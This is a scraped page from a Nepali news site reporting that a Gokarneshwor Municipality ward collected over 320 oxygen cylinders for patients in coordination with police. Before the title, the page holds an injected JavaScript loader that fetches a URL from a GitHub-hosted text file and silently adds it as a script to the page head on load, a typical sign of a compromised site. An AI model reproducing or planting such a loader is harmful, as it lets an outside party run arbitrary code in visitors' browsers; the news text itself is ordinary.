;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); अक्सिजनको सिलिन्डर जम्मा गर्दै गोकर्नेश्वोर नगरपालिका वडा नं ३ – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • अक्सिजनको सिलिन्डर जम्मा गर्दै गोकर्नेश्वोर नगरपालिका वडा नं ३
Breaking News

अक्सिजनको सिलिन्डर जम्मा गर्दै गोकर्नेश्वोर नगरपालिका वडा नं ३

काठमाडौं,जेठ१।

गोकर्णेश्वर नगरपालिका वडा नं ३ बाट अक्सिजनका सिलिन्डरहरु संकलन गरिएको छ| वडा अध्यक्ष राजेन्द्र कुमार भण्डारीको नेतृत्वमा महानगरीय प्रहरी प्रभाग गोकर्णसंगको समन्वयमा करिब ३२० वटा भन्दा बढी अक्सिजनका सिलिन्डरहरु संकलन गरिएको हो ।

संकलित सिलिन्डर अत्यावश्यक बिरामीको लागि प्रदान गरिने र प्राप्त  अक्सिजन सिलिन्डर प्रयोग पश्चात फिर्ता  गरिने सर्तमा संकलन गरिएको वडा अध्यक्ष भण्डारीले कपन अनलाइनलाइ जानकारी गराए ।

 

फेसबुक प्रतिक्रियाहरु